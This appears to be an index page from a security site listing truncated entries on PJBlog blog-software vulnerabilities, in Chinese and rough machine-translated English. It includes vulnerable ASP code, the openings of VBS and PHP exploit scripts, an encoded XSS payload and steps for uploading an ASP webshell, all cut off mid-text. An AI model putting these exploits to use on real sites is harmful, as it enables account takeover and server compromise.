PJBlog 3.2.9.518 getwebshell exploit-vulnerability warning-the black bar safety net

Author: do not go to the bell Version: PJblog 3.2.9.518（2012/5/9, When is the latest version The exploit conditions: 1, Using full static mode by default is a fully static mode 2, The user can post the default regular users can not post, so a little tasteless） Vulnerability description: PJblog...

PJBlog v3.0.6.170 文件Action.asp xss跨站漏洞

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。 在文件Action.asp中： elseif request"action"="type1" then //第23行 dim mainurl,main,mainstr mainurl=request"mainurl" main=trimcheckstrrequest"main" response.clear mainstr="" If LenmemName0 Then mainstr=mainstr&"img...

PJBLOG文件Action.asp 修改任意用户密码

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术 在文件Action.asp中： ElseIf Request.QueryString"action" = "updatepassto" Then //第307行 If ChkPost Then Dim ePass, eRePass, eID, eRs, ehash, dpass eID = CheckStrUnEscapeRequest.QueryString"id" ePass =...

PJBlog 3.0.6.170 Arbitrary File Upload

Discoverd By: Securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir Application Info: Name: PJBlog Version: v3.0.6.170 Dork: intext:"PJBlog3 v3.0.6.170" errorreporting0; settimelimit0; iniset"defaultsockettimeout", 5; defineSTDIN, fopen"php://stdin", "r"; function httpsend$host,...

PJBlog博客程序多个文件存在SQL注入漏洞

经代码审核发现blogcomm.asp、class/clswap.asp、member.asp存在SQL注入漏洞。 在member.asp文件 1. UID=trimCheckStrrequest.form"UID" //191行 2. …………………… 3. set checkUser=conn.execute"select top 1 from blogMember where memid="&UID" and memName='"&CheckStrmemName"'" 4. if checkUser.eof then 5. ReInfo0="错误信息" 6...

PJBlog博客系统后台Action.asp页面DelUserID变量过滤不严导致SQL注入缺陷

文件control/ Action.aspp中： 1. ElseIf Request.Form"whatdo" = "DelUser" Then //第510行 2. Dim DelUserID, DelUserName, blogmemberNum, DelUserStatus 3. DelUserID = Request.Form"DelID" 4. blogmemberNum = conn.Execute"select countmemID from blogMember where memStatus='SupAdmin'"0 5. 6. DelUserStatus =...

PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。 在文件class/clslogAction.asp中： oldcate=request.form"oldcate" //第429行 oldctype=request.form"oldtype" D = conn.execute"select catePart from blogCategory where cateID="&oldcate0 程序没有对变量oldcate做任何过滤放入sql查询语句中，导致注入漏洞的产生。 PJBlog...

PJBlog博客系统后台c_members.asp页面User变量过滤不严导致SQL注入漏洞

在文件control/ cmembers.asp中： 1. FindUser = Request.QueryString"User" //第28行 2. If LenFindUser1 Then 3. FindUserFilter = "" 4. Else 5. FindUserFilter = " AND M.memName='" & FindUser & "'" 6. End If 7. …… 8. SQL = "SELECT M.,S.statname,S.stattitle FROM blogMember as M,blogstatus as S where...

PJBlog博客系统blogpost.asp页面log_CateID变量过滤不严导致SQL注入漏洞

在文件blogpost.asp中： div id="MsgHead"在【& lt;%=Conn.ExeCute"SELECT cateName FROM blogCategory WHERE cateID="& amp;Request.Form"logCateID"&""0%】发表日志/div //第162行 程序没有对变量logCateID过滤放入sql语句导致sql注入的产生。 3.0 Beta PJblog ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://bbs.pjhome.net/thread-48122-1-1.html PO...

PJBlog博客系统后台Action.aspSQL注入缺陷

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，PJBlog同时支持简繁中文，UTF-8编码，相对于其他系统，PJBlog具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。 在文件control/ Action.aspp中。 变量moduleID，GetPlugName，KeyWordID，smilesID，LinkID，memID，doCommID，selCommID，TagsID，DelCate没有过滤放入sql语句导致注入漏洞的产生。 3.0 Beta PJblog -------...

PJBlog个人博客系统Action.asp页面跨站脚本攻击漏洞

在文件Action.asp中： elseif request"action"="type1" then //第23行 dim mainurl,main,mainstr mainurl=request"mainurl" main=trimcheckstrrequest"main" response.clear mainstr="" If LenmemName0 Then mainstr=mainstr&"img src=""images/download.gif"" alt=""下载文件"" style=""margin:0px 2px -4px 0px""/ a...

PJBlog个人博客系统Getarticle.asp页面存在跨站脚本攻击漏洞

PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。 在文件Getarticle.asp中： blogpostFile = request"blogpostFile" //第14行 ...... If Ifmore or thispage1 then //第100行 OutPut=OutPut&"br/strong模式:/strong a style='cursor:pointer'...

PJblog V3.0 0day Vbs

No description provided by source. If WScript.Arguments.Count 2 Then WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名" WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam" WScript.Quit End If attackUrl = WScript.Arguments0 attackUser = WScript.Arguments1 attackUrl =...

PJblog V3. 0 0day-vulnerability warning-the black bar safety net

Original link: ? php / PJblog V3. 0 0day exp code by small Roach&bink www.0kee.com www.t00ls.net 09.04.22 / $url="http://www.pjhome.net"; //inject the address $varname="puterjam"; //administrator $varkey="checkright"; if $SESSION"LenI" $LenI=$SESSION"LenI"; else $LenI=1; for$i=$LenI;$i=4 0;$i++...

PJblog V3. 0 0day Vbs version of the exploit tool-vulnerability warning-the black bar safety net

Vulnerability details please seeon my computer there is no install php, just write a Vbs version of the exploit Tool, the specific code as follows: 1. If WScript. Arguments. Count 2 Then 2. WScript. Echo “Usage: Cscript.exe Exp. vbs to detect the forum URL you want to detect the user name” 3...

PJblog the latest cross-site code-vulnerability warning-the black bar safety net

Just find a PJBLOG and then register a user.. After landing into the guestbook Input message remember in the secret where that box to be on the hook.. The message code can be like this: font=expressioncontainer. document. writeunescape'%6 8%7 4%7 4%7 0%3A%2F%2F%7 7% 7 7% 7 7%2%7 7% 6 9%6E%7 3% 6 ...

pjblog upload vulnerability-vulnerability warning-the black bar safety net

First of all have pjblog the super administrator accounteven is to take their blog to the test Log in, post a new log, pass an asp horse, and the extension to get rid of that pjblog seemingly didn't do the file header check, remember address Then login the backend, the recovery database before...

PJBLOG photo album plug-in there is a serious vulnerability-a vulnerability warning-the black bar safety net

Continue the Halo one! The want to get hold of a PJ album plug-in to play, did not expect to pass up, vulnerability is I found. The following I listed in the vulnerability details. -------------------------------------------------- Software name: PJBLOG album plug-in V2. 0 Wizard full version...